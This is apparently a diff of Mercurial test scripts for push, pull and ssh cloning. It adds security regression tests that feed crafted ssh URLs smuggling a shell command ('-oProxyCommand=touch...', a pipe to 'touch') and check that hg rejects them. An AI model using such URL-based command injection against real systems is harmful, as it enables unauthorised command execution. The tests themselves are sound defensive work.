102 abort: file:// URLs can only refer to localhost
103 [255]
103 [255]
104
104
105 $ URL=`$PYTHON -c "import os; print 'file://localhost' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test'"`
105 $ URL=`$PYTHON -c "import os; print 'file://localhost' + ('/' + os.getcwd().replace(os.sep, '/')).replace('//', '/') + '/../test'"`
106 $ hg pull -q "$URL"
106 $ hg pull -q "$URL"
107
107
108 SEC: check for unsafe ssh url
109
110 $ cat >> $HGRCPATH << EOF
111 > [ui]
112 > ssh = sh -c "read l; read l; read l"
113 > EOF
114
115 $ hg pull 'ssh://-oProxyCommand=touch${IFS}owned/path'
116 pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
117 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
118 [255]
119 $ hg pull 'ssh://%2DoProxyCommand=touch${IFS}owned/path'
120 pulling from ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
121 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
122 [255]
123 $ hg pull 'ssh://fakehost|touch${IFS}owned/path'
124 pulling from ssh://fakehost%7Ctouch%24%7BIFS%7Downed/path
125 abort: no suitable response from remote hg!
126 [255]
127 $ hg pull 'ssh://fakehost%7Ctouch%20owned/path'
128 pulling from ssh://fakehost%7Ctouch%20owned/path
129 abort: no suitable response from remote hg!
130 [255]
131
132 $ [ ! -f owned ] || echo 'you got owned'
133
108 $ cd ..
134 $ cd ..
@@ -1,318 +1,344 b''
1 ==================================
1 ==================================
2 Basic testing for the push command
2 Basic testing for the push command
3 ==================================
3 ==================================
4
4
5 Testing of the '--rev' flag
5 Testing of the '--rev' flag
6 ===========================
6 ===========================
7
7
8 $ hg init test-revflag
8 $ hg init test-revflag
9 $ hg -R test-revflag unbundle "$TESTDIR/bundles/remote.hg"
9 $ hg -R test-revflag unbundle "$TESTDIR/bundles/remote.hg"
10 adding changesets
10 adding changesets
11 adding manifests
11 adding manifests
12 adding file changes
12 adding file changes
13 added 9 changesets with 7 changes to 4 files (+1 heads)
13 added 9 changesets with 7 changes to 4 files (+1 heads)
14 (run 'hg heads' to see heads, 'hg merge' to merge)
14 (run 'hg heads' to see heads, 'hg merge' to merge)
15
15
16 $ for i in 0 1 2 3 4 5 6 7 8; do
16 $ for i in 0 1 2 3 4 5 6 7 8; do
17 > echo
17 > echo
18 > hg init test-revflag-"$i"
18 > hg init test-revflag-"$i"
19 > hg -R test-revflag push -r "$i" test-revflag-"$i"
19 > hg -R test-revflag push -r "$i" test-revflag-"$i"
20 > hg -R test-revflag-"$i" verify
20 > hg -R test-revflag-"$i" verify
21 > done
21 > done
22
22
23 pushing to test-revflag-0
23 pushing to test-revflag-0
24 searching for changes
24 searching for changes
25 adding changesets
25 adding changesets
26 adding manifests
26 adding manifests
27 adding file changes
27 adding file changes
28 added 1 changesets with 1 changes to 1 files
28 added 1 changesets with 1 changes to 1 files
29 checking changesets
29 checking changesets
30 checking manifests
30 checking manifests
31 crosschecking files in changesets and manifests
31 crosschecking files in changesets and manifests
32 checking files
32 checking files
33 1 files, 1 changesets, 1 total revisions
33 1 files, 1 changesets, 1 total revisions
34
34
35 pushing to test-revflag-1
35 pushing to test-revflag-1
36 searching for changes
36 searching for changes
37 adding changesets
37 adding changesets
38 adding manifests
38 adding manifests
39 adding file changes
39 adding file changes
40 added 2 changesets with 2 changes to 1 files
40 added 2 changesets with 2 changes to 1 files
41 checking changesets
41 checking changesets
42 checking manifests
42 checking manifests
43 crosschecking files in changesets and manifests
43 crosschecking files in changesets and manifests
44 checking files
44 checking files
45 1 files, 2 changesets, 2 total revisions
45 1 files, 2 changesets, 2 total revisions
46
46
47 pushing to test-revflag-2
47 pushing to test-revflag-2
48 searching for changes
48 searching for changes
49 adding changesets
49 adding changesets
50 adding manifests
50 adding manifests
51 adding file changes
51 adding file changes
52 added 3 changesets with 3 changes to 1 files
52 added 3 changesets with 3 changes to 1 files
53 checking changesets
53 checking changesets
54 checking manifests
54 checking manifests
55 crosschecking files in changesets and manifests
55 crosschecking files in changesets and manifests
56 checking files
56 checking files
57 1 files, 3 changesets, 3 total revisions
57 1 files, 3 changesets, 3 total revisions
58
58
59 pushing to test-revflag-3
59 pushing to test-revflag-3
60 searching for changes
60 searching for changes
61 adding changesets
61 adding changesets
62 adding manifests
62 adding manifests
63 adding file changes
63 adding file changes
64 added 4 changesets with 4 changes to 1 files
64 added 4 changesets with 4 changes to 1 files
65 checking changesets
65 checking changesets
66 checking manifests
66 checking manifests
67 crosschecking files in changesets and manifests
67 crosschecking files in changesets and manifests
68 checking files
68 checking files
69 1 files, 4 changesets, 4 total revisions
69 1 files, 4 changesets, 4 total revisions
70
70
71 pushing to test-revflag-4
71 pushing to test-revflag-4
72 searching for changes
72 searching for changes
73 adding changesets
73 adding changesets
74 adding manifests
74 adding manifests
75 adding file changes
75 adding file changes
76 added 2 changesets with 2 changes to 1 files
76 added 2 changesets with 2 changes to 1 files
77 checking changesets
77 checking changesets
78 checking manifests
78 checking manifests
79 crosschecking files in changesets and manifests
79 crosschecking files in changesets and manifests
80 checking files
80 checking files
81 1 files, 2 changesets, 2 total revisions
81 1 files, 2 changesets, 2 total revisions
82
82
83 pushing to test-revflag-5
83 pushing to test-revflag-5
84 searching for changes
84 searching for changes
85 adding changesets
85 adding changesets
86 adding manifests
86 adding manifests
87 adding file changes
87 adding file changes
88 added 3 changesets with 3 changes to 1 files
88 added 3 changesets with 3 changes to 1 files
89 checking changesets
89 checking changesets
90 checking manifests
90 checking manifests
91 crosschecking files in changesets and manifests
91 crosschecking files in changesets and manifests
92 checking files
92 checking files
93 1 files, 3 changesets, 3 total revisions
93 1 files, 3 changesets, 3 total revisions
94
94
95 pushing to test-revflag-6
95 pushing to test-revflag-6
96 searching for changes
96 searching for changes
97 adding changesets
97 adding changesets
98 adding manifests
98 adding manifests
99 adding file changes
99 adding file changes
100 added 4 changesets with 5 changes to 2 files
100 added 4 changesets with 5 changes to 2 files
101 checking changesets
101 checking changesets
102 checking manifests
102 checking manifests
103 crosschecking files in changesets and manifests
103 crosschecking files in changesets and manifests
104 checking files
104 checking files
105 2 files, 4 changesets, 5 total revisions
105 2 files, 4 changesets, 5 total revisions
106
106
107 pushing to test-revflag-7
107 pushing to test-revflag-7
108 searching for changes
108 searching for changes
109 adding changesets
109 adding changesets
110 adding manifests
110 adding manifests
111 adding file changes
111 adding file changes
112 added 5 changesets with 6 changes to 3 files
112 added 5 changesets with 6 changes to 3 files
113 checking changesets
113 checking changesets
114 checking manifests
114 checking manifests
115 crosschecking files in changesets and manifests
115 crosschecking files in changesets and manifests
116 checking files
116 checking files
117 3 files, 5 changesets, 6 total revisions
117 3 files, 5 changesets, 6 total revisions
118
118
119 pushing to test-revflag-8
119 pushing to test-revflag-8
120 searching for changes
120 searching for changes
121 adding changesets
121 adding changesets
122 adding manifests
122 adding manifests
123 adding file changes
123 adding file changes
124 added 5 changesets with 5 changes to 2 files
124 added 5 changesets with 5 changes to 2 files
125 checking changesets
125 checking changesets
126 checking manifests
126 checking manifests
127 crosschecking files in changesets and manifests
127 crosschecking files in changesets and manifests
128 checking files
128 checking files
129 2 files, 5 changesets, 5 total revisions
129 2 files, 5 changesets, 5 total revisions
130
130
131 $ cd test-revflag-8
131 $ cd test-revflag-8
132
132
133 $ hg pull ../test-revflag-7
133 $ hg pull ../test-revflag-7
134 pulling from ../test-revflag-7
134 pulling from ../test-revflag-7
135 searching for changes
135 searching for changes
136 adding changesets
136 adding changesets
137 adding manifests
137 adding manifests
138 adding file changes
138 adding file changes
139 added 4 changesets with 2 changes to 3 files (+1 heads)
139 added 4 changesets with 2 changes to 3 files (+1 heads)
140 (run 'hg heads' to see heads, 'hg merge' to merge)
140 (run 'hg heads' to see heads, 'hg merge' to merge)
141
141
142 $ hg verify
142 $ hg verify
143 checking changesets
143 checking changesets
144 checking manifests
144 checking manifests
145 crosschecking files in changesets and manifests
145 crosschecking files in changesets and manifests
146 checking files
146 checking files
147 4 files, 9 changesets, 7 total revisions
147 4 files, 9 changesets, 7 total revisions
148
148
149 $ cd ..
149 $ cd ..
150
150
151 Test server side validation during push
151 Test server side validation during push
152 =======================================
152 =======================================
153
153
154 $ hg init test-validation
154 $ hg init test-validation
155 $ cd test-validation
155 $ cd test-validation
156
156
157 $ cat > .hg/hgrc <<EOF
157 $ cat > .hg/hgrc <<EOF
158 > [server]
158 > [server]
159 > validate=1
159 > validate=1
160 > EOF
160 > EOF
161
161
162 $ echo alpha > alpha
162 $ echo alpha > alpha
163 $ echo beta > beta
163 $ echo beta > beta
164 $ hg addr
164 $ hg addr
165 adding alpha
165 adding alpha
166 adding beta
166 adding beta
167 $ hg ci -m 1
167 $ hg ci -m 1
168
168
169 $ cd ..
169 $ cd ..
170 $ hg clone test-validation test-validation-clone
170 $ hg clone test-validation test-validation-clone
171 updating to branch default
171 updating to branch default
172 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
172 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
173
173
174 Test spurious filelog entries:
174 Test spurious filelog entries:
175
175
176 $ cd test-validation-clone
176 $ cd test-validation-clone
177 $ echo blah >> beta
177 $ echo blah >> beta
178 $ cp .hg/store/data/beta.i tmp1
178 $ cp .hg/store/data/beta.i tmp1
179 $ hg ci -m 2
179 $ hg ci -m 2
180 $ cp .hg/store/data/beta.i tmp2
180 $ cp .hg/store/data/beta.i tmp2
181 $ hg -q rollback
181 $ hg -q rollback
182 $ mv tmp2 .hg/store/data/beta.i
182 $ mv tmp2 .hg/store/data/beta.i
183 $ echo blah >> beta
183 $ echo blah >> beta
184 $ hg ci -m '2 (corrupt)'
184 $ hg ci -m '2 (corrupt)'
185
185
186 Expected to fail:
186 Expected to fail:
187
187
188 $ hg verify
188 $ hg verify
189 checking changesets
189 checking changesets
190 checking manifests
190 checking manifests
191 crosschecking files in changesets and manifests
191 crosschecking files in changesets and manifests
192 checking files
192 checking files
193 beta@1: dddc47b3ba30 not in manifests
193 beta@1: dddc47b3ba30 not in manifests
194 2 files, 2 changesets, 4 total revisions
194 2 files, 2 changesets, 4 total revisions
195 1 integrity errors encountered!
195 1 integrity errors encountered!
196 (first damaged changeset appears to be 1)
196 (first damaged changeset appears to be 1)
197 [1]
197 [1]
198
198
199 $ hg push
199 $ hg push
200 pushing to $TESTTMP/test-validation (glob)
200 pushing to $TESTTMP/test-validation (glob)
201 searching for changes
201 searching for changes
202 adding changesets
202 adding changesets
203 adding manifests
203 adding manifests
204 adding file changes
204 adding file changes
205 transaction abort!
205 transaction abort!
206 rollback completed
206 rollback completed
207 abort: received spurious file revlog entry
207 abort: received spurious file revlog entry
208 [255]
208 [255]
209
209
210 $ hg -q rollback
210 $ hg -q rollback
211 $ mv tmp1 .hg/store/data/beta.i
211 $ mv tmp1 .hg/store/data/beta.i
212 $ echo beta > beta
212 $ echo beta > beta
213
213
214 Test missing filelog entries:
214 Test missing filelog entries:
215
215
216 $ cp .hg/store/data/beta.i tmp
216 $ cp .hg/store/data/beta.i tmp
217 $ echo blah >> beta
217 $ echo blah >> beta
218 $ hg ci -m '2 (corrupt)'
218 $ hg ci -m '2 (corrupt)'
219 $ mv tmp .hg/store/data/beta.i
219 $ mv tmp .hg/store/data/beta.i
220
220
221 Expected to fail:
221 Expected to fail:
222
222
223 $ hg verify
223 $ hg verify
224 checking changesets
224 checking changesets
225 checking manifests
225 checking manifests
226 crosschecking files in changesets and manifests
226 crosschecking files in changesets and manifests
227 checking files
227 checking files
228 beta@1: manifest refers to unknown revision dddc47b3ba30
228 beta@1: manifest refers to unknown revision dddc47b3ba30
229 2 files, 2 changesets, 2 total revisions
229 2 files, 2 changesets, 2 total revisions
230 1 integrity errors encountered!
230 1 integrity errors encountered!
231 (first damaged changeset appears to be 1)
231 (first damaged changeset appears to be 1)
232 [1]
232 [1]
233
233
234 $ hg push
234 $ hg push
235 pushing to $TESTTMP/test-validation (glob)
235 pushing to $TESTTMP/test-validation (glob)
236 searching for changes
236 searching for changes
237 adding changesets
237 adding changesets
238 adding manifests
238 adding manifests
239 adding file changes
239 adding file changes
240 transaction abort!
240 transaction abort!
241 rollback completed
241 rollback completed
242 abort: missing file data for beta:dddc47b3ba30e54484720ce0f4f768a0f4b6efb9 - run hg verify
242 abort: missing file data for beta:dddc47b3ba30e54484720ce0f4f768a0f4b6efb9 - run hg verify
243 [255]
243 [255]
244
244
245 $ cd ..
245 $ cd ..
246
246
247 Test push hook locking
247 Test push hook locking
248 =====================
248 =====================
249
249
250 $ hg init 1
250 $ hg init 1
251
251
252 $ echo '[ui]' >> 1/.hg/hgrc
252 $ echo '[ui]' >> 1/.hg/hgrc
253 $ echo 'timeout = 10' >> 1/.hg/hgrc
253 $ echo 'timeout = 10' >> 1/.hg/hgrc
254
254
255 $ echo foo > 1/foo
255 $ echo foo > 1/foo
256 $ hg --cwd 1 ci -A -m foo
256 $ hg --cwd 1 ci -A -m foo
257 adding foo
257 adding foo
258
258
259 $ hg clone 1 2
259 $ hg clone 1 2
260 updating to branch default
260 updating to branch default
261 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
261 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
262
262
263 $ hg clone 2 3
263 $ hg clone 2 3
264 updating to branch default
264 updating to branch default
265 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
265 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
266
266
267 $ cat <<EOF > $TESTTMP/debuglocks-pretxn-hook.sh
267 $ cat <<EOF > $TESTTMP/debuglocks-pretxn-hook.sh
268 > hg debuglocks
268 > hg debuglocks
269 > true
269 > true
270 > EOF
270 > EOF
271 $ echo '[hooks]' >> 2/.hg/hgrc
271 $ echo '[hooks]' >> 2/.hg/hgrc
272 $ echo "pretxnchangegroup.a = sh $TESTTMP/debuglocks-pretxn-hook.sh" >> 2/.hg/hgrc
272 $ echo "pretxnchangegroup.a = sh $TESTTMP/debuglocks-pretxn-hook.sh" >> 2/.hg/hgrc
273 $ echo 'changegroup.push = hg push -qf ../1' >> 2/.hg/hgrc
273 $ echo 'changegroup.push = hg push -qf ../1' >> 2/.hg/hgrc
274
274
275 $ echo bar >> 3/foo
275 $ echo bar >> 3/foo
276 $ hg --cwd 3 ci -m bar
276 $ hg --cwd 3 ci -m bar
277
277
278 $ hg --cwd 3 push ../2 --config devel.legacy.exchange=bundle1
278 $ hg --cwd 3 push ../2 --config devel.legacy.exchange=bundle1
279 pushing to ../2
279 pushing to ../2
280 searching for changes
280 searching for changes
281 adding changesets
281 adding changesets
282 adding manifests
282 adding manifests
283 adding file changes
283 adding file changes
284 added 1 changesets with 1 changes to 1 files
284 added 1 changesets with 1 changes to 1 files
285 lock: user *, process * (*s) (glob)
285 lock: user *, process * (*s) (glob)
286 wlock: free
286 wlock: free
287
287
288 $ hg --cwd 1 --config extensions.strip= strip tip -q
288 $ hg --cwd 1 --config extensions.strip= strip tip -q
289 $ hg --cwd 2 --config extensions.strip= strip tip -q
289 $ hg --cwd 2 --config extensions.strip= strip tip -q
290 $ hg --cwd 3 push ../2 # bundle2+
290 $ hg --cwd 3 push ../2 # bundle2+
291 pushing to ../2
291 pushing to ../2
292 searching for changes
292 searching for changes
293 adding changesets
293 adding changesets
294 adding manifests
294 adding manifests
295 adding file changes
295 adding file changes
296 added 1 changesets with 1 changes to 1 files
296 added 1 changesets with 1 changes to 1 files
297 lock: user *, process * (*s) (glob)
297 lock: user *, process * (*s) (glob)
298 wlock: user *, process * (*s) (glob)
298 wlock: user *, process * (*s) (glob)
299
299
300 Test bare push with multiple race checking options
300 Test bare push with multiple race checking options
301 --------------------------------------------------
301 --------------------------------------------------
302
302
303 $ hg init test-bare-push-no-concurrency
303 $ hg init test-bare-push-no-concurrency
304 $ hg init test-bare-push-unrelated-concurrency
304 $ hg init test-bare-push-unrelated-concurrency
305 $ hg -R test-revflag push -r 0 test-bare-push-no-concurrency --config server.concurrent-push-mode=strict
305 $ hg -R test-revflag push -r 0 test-bare-push-no-concurrency --config server.concurrent-push-mode=strict
306 pushing to test-bare-push-no-concurrency
306 pushing to test-bare-push-no-concurrency
307 searching for changes
307 searching for changes
308 adding changesets
308 adding changesets
309 adding manifests
309 adding manifests
310 adding file changes
310 adding file changes
311 added 1 changesets with 1 changes to 1 files
311 added 1 changesets with 1 changes to 1 files
312 $ hg -R test-revflag push -r 0 test-bare-push-unrelated-concurrency --config server.concurrent-push-mode=check-related
312 $ hg -R test-revflag push -r 0 test-bare-push-unrelated-concurrency --config server.concurrent-push-mode=check-related
313 pushing to test-bare-push-unrelated-concurrency
313 pushing to test-bare-push-unrelated-concurrency
314 searching for changes
314 searching for changes
315 adding changesets
315 adding changesets
316 adding manifests
316 adding manifests
317 adding file changes
317 adding file changes
318 added 1 changesets with 1 changes to 1 files
318 added 1 changesets with 1 changes to 1 files
319
320 SEC: check for unsafe ssh url
321
322 $ cat >> $HGRCPATH << EOF
323 > [ui]
324 > ssh = sh -c "read l; read l; read l"
325 > EOF
326
327 $ hg -R test-revflag push 'ssh://-oProxyCommand=touch${IFS}owned/path'
328 pushing to ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
329 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
330 [255]
331 $ hg -R test-revflag push 'ssh://%2DoProxyCommand=touch${IFS}owned/path'
332 pushing to ssh://-oProxyCommand%3Dtouch%24%7BIFS%7Downed/path
333 abort: potentially unsafe url: 'ssh://-oProxyCommand=touch${IFS}owned/path'
334 [255]
335 $ hg -R test-revflag push 'ssh://fakehost|touch${IFS}owned/path'
336 pushing to ssh://fakehost%7Ctouch%24%7BIFS%7Downed/path
337 abort: no suitable response from remote hg!
338 [255]
339 $ hg -R test-revflag push 'ssh://fakehost%7Ctouch%20owned/path'
340 pushing to ssh://fakehost%7Ctouch%20owned/path
341 abort: no suitable response from remote hg!
342 [255]
343
344 $ [ ! -f owned ] || echo 'you got owned'
@@ -1,562 +1,562 b''
1 This test is a duplicate of 'test-http.t' feel free to factor out
1 This test is a duplicate of 'test-http.t' feel free to factor out
2 parts that are not bundle1/bundle2 specific.
2 parts that are not bundle1/bundle2 specific.
3
3
4 $ cat << EOF >> $HGRCPATH
4 $ cat << EOF >> $HGRCPATH
5 > [devel]
5 > [devel]
6 > # This test is dedicated to interaction through old bundle
6 > # This test is dedicated to interaction through old bundle
7 > legacy.exchange = bundle1
7 > legacy.exchange = bundle1
8 > [format] # temporary settings
8 > [format] # temporary settings
9 > usegeneraldelta=yes
9 > usegeneraldelta=yes
10 > EOF
10 > EOF
11
11
12
12
13 This test tries to exercise the ssh functionality with a dummy script
13 This test tries to exercise the ssh functionality with a dummy script
14
14
15 creating 'remote' repo
15 creating 'remote' repo
16
16
17 $ hg init remote
17 $ hg init remote
18 $ cd remote
18 $ cd remote
19 $ echo this > foo
19 $ echo this > foo
20 $ echo this > fooO
20 $ echo this > fooO
21 $ hg ci -A -m "init" foo fooO
21 $ hg ci -A -m "init" foo fooO
22
22
23 insert a closed branch (issue4428)
23 insert a closed branch (issue4428)
24
24
25 $ hg up null
25 $ hg up null
26 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
26 0 files updated, 0 files merged, 2 files removed, 0 files unresolved
27 $ hg branch closed
27 $ hg branch closed
28 marked working directory as branch closed
28 marked working directory as branch closed
29 (branches are permanent and global, did you want a bookmark?)
29 (branches are permanent and global, did you want a bookmark?)
30 $ hg ci -mc0
30 $ hg ci -mc0
31 $ hg ci --close-branch -mc1
31 $ hg ci --close-branch -mc1
32 $ hg up -q default
32 $ hg up -q default
33
33
34 configure for serving
34 configure for serving
35
35
36 $ cat <<EOF > .hg/hgrc
36 $ cat <<EOF > .hg/hgrc
37 > [server]
37 > [server]
38 > uncompressed = True
38 > uncompressed = True
39 >
39 >
40 > [hooks]
40 > [hooks]
41 > changegroup = sh -c "printenv.py changegroup-in-remote 0 ../dummylog"
41 > changegroup = sh -c "printenv.py changegroup-in-remote 0 ../dummylog"
42 > EOF
42 > EOF
43 $ cd ..
43 $ cd ..
44
44
45 repo not found error
45 repo not found error
46
46
47 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/nonexistent local
47 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/nonexistent local
48 remote: abort: repository nonexistent not found!
48 remote: abort: repository nonexistent not found!
49 abort: no suitable response from remote hg!
49 abort: no suitable response from remote hg!
50 [255]
50 [255]
51
51
52 non-existent absolute path
52 non-existent absolute path
53
53
54 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy//`pwd`/nonexistent local
54 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy//`pwd`/nonexistent local
55 remote: abort: repository /$TESTTMP/nonexistent not found!
55 remote: abort: repository /$TESTTMP/nonexistent not found!
56 abort: no suitable response from remote hg!
56 abort: no suitable response from remote hg!
57 [255]
57 [255]
58
58
59 clone remote via stream
59 clone remote via stream
60
60
61 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/remote local-stream
61 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/remote local-stream
62 streaming all changes
62 streaming all changes
63 4 files to transfer, 602 bytes of data
63 4 files to transfer, 602 bytes of data
64 transferred 602 bytes in * seconds (*) (glob)
64 transferred 602 bytes in * seconds (*) (glob)
65 searching for changes
65 searching for changes
66 no changes found
66 no changes found
67 updating to branch default
67 updating to branch default
68 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
68 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
69 $ cd local-stream
69 $ cd local-stream
70 $ hg verify
70 $ hg verify
71 checking changesets
71 checking changesets
72 checking manifests
72 checking manifests
73 crosschecking files in changesets and manifests
73 crosschecking files in changesets and manifests
74 checking files
74 checking files
75 2 files, 3 changesets, 2 total revisions
75 2 files, 3 changesets, 2 total revisions
76 $ hg branches
76 $ hg branches
77 default 0:1160648e36ce
77 default 0:1160648e36ce
78 $ cd ..
78 $ cd ..
79
79
80 clone bookmarks via stream
80 clone bookmarks via stream
81
81
82 $ hg -R local-stream book mybook
82 $ hg -R local-stream book mybook
83 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/local-stream stream2
83 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --uncompressed ssh://user@dummy/local-stream stream2
84 streaming all changes
84 streaming all changes
85 4 files to transfer, 602 bytes of data
85 4 files to transfer, 602 bytes of data
86 transferred 602 bytes in * seconds (*) (glob)
86 transferred 602 bytes in * seconds (*) (glob)
87 searching for changes
87 searching for changes
88 no changes found
88 no changes found
89 updating to branch default
89 updating to branch default
90 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
90 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
91 $ cd stream2
91 $ cd stream2
92 $ hg book
92 $ hg book
93 mybook 0:1160648e36ce
93 mybook 0:1160648e36ce
94 $ cd ..
94 $ cd ..
95 $ rm -rf local-stream stream2
95 $ rm -rf local-stream stream2
96
96
97 clone remote via pull
97 clone remote via pull
98
98
99 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local
99 $ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/remote local
100 requesting all changes
100 requesting all changes
101 adding changesets
101 adding changesets
102 adding manifests
102 adding manifests
103 adding file changes
103 adding file changes
104 added 3 changesets with 2 changes to 2 files
104 added 3 changesets with 2 changes to 2 files
105 updating to branch default
105 updating to branch default
106 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
106 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
107
107
108 verify
108 verify
109
109
110 $ cd local
110 $ cd local
111 $ hg verify
111 $ hg verify
112 checking changesets
112 checking changesets
113 checking manifests
113 checking manifests
114 crosschecking files in changesets and manifests
114 crosschecking files in changesets and manifests
115 checking files
115 checking files
116 2 files, 3 changesets, 2 total revisions
116 2 files, 3 changesets, 2 total revisions
117 $ cat >> .hg/hgrc <<EOF
117 $ cat >> .hg/hgrc <<EOF
118 > [hooks]
118 > [hooks]
119 > changegroup = sh -c "printenv.py changegroup-in-local 0 ../dummylog"
119 > changegroup = sh -c "printenv.py changegroup-in-local 0 ../dummylog"
120 > EOF
120 > EOF
121
121
122 empty default pull
122 empty default pull
123
123
124 $ hg paths
124 $ hg paths
125 default = ssh://user@dummy/remote
125 default = ssh://user@dummy/remote
126 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\""
126 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\""
127 pulling from ssh://user@dummy/remote
127 pulling from ssh://user@dummy/remote
128 searching for changes
128 searching for changes
129 no changes found
129 no changes found
130
130
131 pull from wrong ssh URL
131 pull from wrong ssh URL
132
132
133 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/doesnotexist
133 $ hg pull -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/doesnotexist
134 pulling from ssh://user@dummy/doesnotexist
134 pulling from ssh://user@dummy/doesnotexist
135 remote: abort: repository doesnotexist not found!
135 remote: abort: repository doesnotexist not found!
136 abort: no suitable response from remote hg!
136 abort: no suitable response from remote hg!
137 [255]
137 [255]
138
138
139 local change
139 local change
140
140
141 $ echo bleah > foo
141 $ echo bleah > foo
142 $ hg ci -m "add"
142 $ hg ci -m "add"
143
143
144 updating rc
144 updating rc
145
145
146 $ echo "default-push = ssh://user@dummy/remote" >> .hg/hgrc
146 $ echo "default-push = ssh://user@dummy/remote" >> .hg/hgrc
147 $ echo "[ui]" >> .hg/hgrc
147 $ echo "[ui]" >> .hg/hgrc
148 $ echo "ssh = \"$PYTHON\" \"$TESTDIR/dummyssh\"" >> .hg/hgrc
148 $ echo "ssh = \"$PYTHON\" \"$TESTDIR/dummyssh\"" >> .hg/hgrc
149
149
150 find outgoing
150 find outgoing
151
151
152 $ hg out ssh://user@dummy/remote
152 $ hg out ssh://user@dummy/remote
153 comparing with ssh://user@dummy/remote
153 comparing with ssh://user@dummy/remote
154 searching for changes
154 searching for changes
155 changeset: 3:a28a9d1a809c
155 changeset: 3:a28a9d1a809c
156 tag: tip
156 tag: tip
157 parent: 0:1160648e36ce
157 parent: 0:1160648e36ce
158 user: test
158 user: test
159 date: Thu Jan 01 00:00:00 1970 +0000
159 date: Thu Jan 01 00:00:00 1970 +0000
160 summary: add
160 summary: add
161
161
162
162
163 find incoming on the remote side
163 find incoming on the remote side
164
164
165 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/local
165 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/local
166 comparing with ssh://user@dummy/local
166 comparing with ssh://user@dummy/local
167 searching for changes
167 searching for changes
168 changeset: 3:a28a9d1a809c
168 changeset: 3:a28a9d1a809c
169 tag: tip
169 tag: tip
170 parent: 0:1160648e36ce
170 parent: 0:1160648e36ce
171 user: test
171 user: test
172 date: Thu Jan 01 00:00:00 1970 +0000
172 date: Thu Jan 01 00:00:00 1970 +0000
173 summary: add
173 summary: add
174
174
175
175
176 find incoming on the remote side (using absolute path)
176 find incoming on the remote side (using absolute path)
177
177
178 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/`pwd`"
178 $ hg incoming -R ../remote -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" "ssh://user@dummy/`pwd`"
179 comparing with ssh://user@dummy/$TESTTMP/local
179 comparing with ssh://user@dummy/$TESTTMP/local
180 searching for changes
180 searching for changes
181 changeset: 3:a28a9d1a809c
181 changeset: 3:a28a9d1a809c
182 tag: tip
182 tag: tip
183 parent: 0:1160648e36ce
183 parent: 0:1160648e36ce
184 user: test
184 user: test
185 date: Thu Jan 01 00:00:00 1970 +0000
185 date: Thu Jan 01 00:00:00 1970 +0000
186 summary: add
186 summary: add
187
187
188
188
189 push
189 push
190
190
191 $ hg push
191 $ hg push
192 pushing to ssh://user@dummy/remote
192 pushing to ssh://user@dummy/remote
193 searching for changes
193 searching for changes
194 remote: adding changesets
194 remote: adding changesets
195 remote: adding manifests
195 remote: adding manifests
196 remote: adding file changes
196 remote: adding file changes
197 remote: added 1 changesets with 1 changes to 1 files
197 remote: added 1 changesets with 1 changes to 1 files
198 $ cd ../remote
198 $ cd ../remote
199
199
200 check remote tip
200 check remote tip
201
201
202 $ hg tip
202 $ hg tip
203 changeset: 3:a28a9d1a809c
203 changeset: 3:a28a9d1a809c
204 tag: tip
204 tag: tip
205 parent: 0:1160648e36ce
205 parent: 0:1160648e36ce
206 user: test
206 user: test
207 date: Thu Jan 01 00:00:00 1970 +0000
207 date: Thu Jan 01 00:00:00 1970 +0000
208 summary: add
208 summary: add
209
209
210 $ hg verify
210 $ hg verify
211 checking changesets
211 checking changesets
212 checking manifests
212 checking manifests
213 crosschecking files in changesets and manifests
213 crosschecking files in changesets and manifests
214 checking files
214 checking files
215 2 files, 4 changesets, 3 total revisions
215 2 files, 4 changesets, 3 total revisions
216 $ hg cat -r tip foo
216 $ hg cat -r tip foo
217 bleah
217 bleah
218 $ echo z > z
218 $ echo z > z
219 $ hg ci -A -m z z
219 $ hg ci -A -m z z
220 created new head
220 created new head
221
221
222 test pushkeys and bookmarks
222 test pushkeys and bookmarks
223
223
224 $ cd ../local
